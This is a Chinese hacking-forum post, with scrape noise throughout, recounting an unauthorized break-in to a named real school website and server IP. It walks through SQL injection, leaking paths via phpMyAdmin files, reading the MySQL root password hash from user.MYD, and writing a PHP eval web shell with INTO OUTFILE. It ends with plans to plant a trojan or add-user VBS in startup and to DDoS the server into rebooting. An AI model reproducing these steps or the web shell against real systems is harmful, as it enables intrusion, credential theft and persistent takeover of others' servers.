第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏& S; Q6 M, Y6 w' d
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
! Z& r9 h' X; H0 Q
& w4 E2 N3 o: k2 w. N7 z. ?& B, L
- ^/ C8 P/ }, Q3 U! ^' k: R; ?常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 1 [$ U+ S+ R. C$ h7 X( G/ `
/ D$ F. @0 T7 t那么想可以直接写入shell ,getshell有几个条件:
5 c5 M& Q- s4 p H E* Q" }1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
/ I7 O% d! R7 o5 _
6 p9 W2 W& S8 t+ Z试着爆绝对路径:
5 K, y) t, J- z* Z9 j$ d+ e5 ?1./phpMyAdmin/index.php?lang[]=1 8 i% [" [" i) J+ g5 T6 s) l- H
2./phpMyAdmin/phpinfo.php ; z: P' f3 _. G3 G5 \
3./load_file() 6 S1 q: M" J; S* @/ S1 q
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
, \. O. K4 q! d: I: s V5./phpmyadmin/libraries/select_lang.lib.php / }. s7 J1 ^+ N) H
6./phpmyadmin/libraries/lect_lang.lib.php 4 g+ \6 X5 n# \/ ~9 \
7./phpmyadmin/libraries/mcrypt.lib.php
- C4 U. j' {( G8./phpmyadmin/libraries/export/xls.php
; e* L% b, S' Q D9 S; U& x. d6 k, q- d( C/ L: P ]
均不行...........................
& G8 e3 C# N. V' f0 n0 q
3 b2 Y4 V0 d7 a y$ V御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
" b* H: O* C, {' i3 y
. Q0 b! ]; ]2 I权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# t% [3 g7 U$ g4 ?- {" U, \: N7 q9 q* W* b' L; y- o
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 " f. r5 c; H7 J6 X, g5 h' R5 }, G
" |3 ~+ a, {, \
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... $ u# |- Y+ o2 o, N4 j$ Z7 J& O/ E
: K a' `) f, o$ y# I: ^1 Q
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 6 Q# j, i- ]6 I) k- h' E, t; ?5 g
! S) p- {, \( N g+ K- ohttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
# ~! y& E, D+ ?6 Y3 n1 j8 ]' ?$ y0 ?7 a8 H- a
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
* g( J: a# M4 q: P+ f
0 W+ l5 h/ w# e$ g a2 i4 D+ [成功读到root密码: # p# N4 X& Q5 U7 e! h- u
2 C8 q8 J0 ^( Q17---- r(0072)
, k$ z, p) n1 U18---- o(006f)
T7 q9 \6 V5 D b0 Z6 o" Z; [19---- o(006f)
1 R* Y( P: ^' r0 @ P5 J20---- t(0074) & X" ~5 O7 c( |
21---- *(002a) & k! i. U& p" G% _; _
22---- 8(0038) , A( m/ C( n4 ^
23---- 2(0032)
e. P/ ?. }9 `- d& [- e24---- E(0045)
; c8 c; f9 `$ v% O1 N25---- 1(0031) + @5 n @' o. ]2 [) q( S
26---- C(0043) : ] R6 e6 `' @* W3 L0 q
27---- 5(0035) 7 p# R( N& i" [7 }1 H" n
28---- 8(0038) 6 R/ ^3 ?, c# _) a8 y6 l# ]7 u
29---- 2(0032)
+ P4 ~! o! S6 g# e5 I30---- 8(0038) . u# H2 b* g$ C
31---- A(0041) 2 }1 C) Y- V/ j+ M5 Q; X
32---- 9(0039)
9 r. G: H/ L) K33---- B(0042)
! y" v- C% X; ~* c3 h# C$ S34---- 5(0035) * G. {0 y# q6 Z3 Z9 ~1 N
35---- 4(0034)
5 I5 G. _% Z9 H, y36---- 8(0038)
2 b* o' a$ a0 O6 k$ e37---- 6(0036) ( W% i; q2 C( P, H0 \; H) v* _; z. X
38---- 4(0034)
! Z/ V# D3 r2 S39---- 9(0039)
E( u4 @1 z6 i40---- 1(0031) . V! h( Z' h( Z! d
41---- 1(0031)
( E5 v+ ~ d. ]0 a8 x42---- 5(0035) 7 G- G+ f: W- l$ F3 v
43---- 3(0033)
# j6 K( j( D2 J& h9 ?44---- 5(0035)
* e$ O0 ]# k3 c45---- 9(0039) 1 R) V! M, x' M8 y
46---- 8(0038)
. _( H3 |. [ S6 H1 f47---- F(0046)
1 f1 A$ H% M# K4 }4 i7 R48---- F(0046) 5 i1 E ?- s& [5 K1 A
49---- 4(0034) 7 n5 D! {5 q) q! W
50---- F(0046)
9 d3 Z* Q" `8 L, G: d51---- 0(0030) ' m8 G7 H! `6 B% U# }
52---- 3(0033)
) A9 {& h' \) \" H5 \- E53---- 2(0032) * m& h: A: X" l2 O! ^
54---- A(0041) ) F4 ?$ a7 u/ y8 t( o E
55---- 4(0034)
0 L9 x7 Q' g% L" x9 Q56---- A(0041)
8 C5 {: n2 n* o/ e9 B+ L57---- B(0042)
' ^) l- L1 e4 n0 o58---- *(0044) - Q8 l# l9 M4 l9 E* `
59---- *(0035)
|6 i8 e- A9 C0 m. o60---- *(0041)
% v: X6 k4 H( i61---- *0032) ! n1 f" h- Z' [$ h, P* L
. Q/ W$ x( G! k
解密后成功登陆phpmyamin
# O' x! J/ o/ W ' y$ D' t4 I; `
4 k/ B* o8 q, W: S
. Z3 |: U% D( M7 K
" ~6 j" ^1 L: X+ M2 e
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
- X' ?: n, l- \" C1 h( U" R
5 @) @$ K3 W- o) ?0 |* f成功执行,拿下shell,菜刀连接: 2 r3 P8 ?% I; x' B* C
; m2 y5 a" Y, t1 z服务器不支持asp,aspx,php提权无果................... : W2 M$ Y H1 h4 ^# J
6 @) v8 c( P9 u. Y! E) `( {4 j0 X
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
/ |1 s4 |2 y E2 J. c5 ?0 d' \服务器上已经有个隐藏帐号了 ! l8 G' S7 }: T: J) C
别名 administrators
4 {2 N, c5 O* A: Q7 w注释 管理员对计算机/域有不受限制的完全访问权 4 b: _/ z* q) g. N
成员 8 I w1 z- v4 \
-------------------------------------------------------------------------------
1 y/ Y' T8 n" r# f0 z+ tadmin% O1 ~ z4 r5 j, g; J
Administrator
2 W& B, ^2 C3 M/ s+ b }slipper$
: M5 q6 c6 u: Q: F" qsqluser
" A4 k/ M* X& A+ _$ `8 K命令成功完成。
% b, J; D6 k) a$ E" Y; u9 `& e5 M: I" {5 s; [
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
- `/ w# ?( X- v, S
% K& v8 b" K7 z& }" Q0 Rddos服务器重启,不然就只能坐等服务器重启了..............................., A" Q1 g& C$ K8 j) i/ u9 r; r
1 O) n+ p! }" s: L
( M) c2 j) s; X1 C
|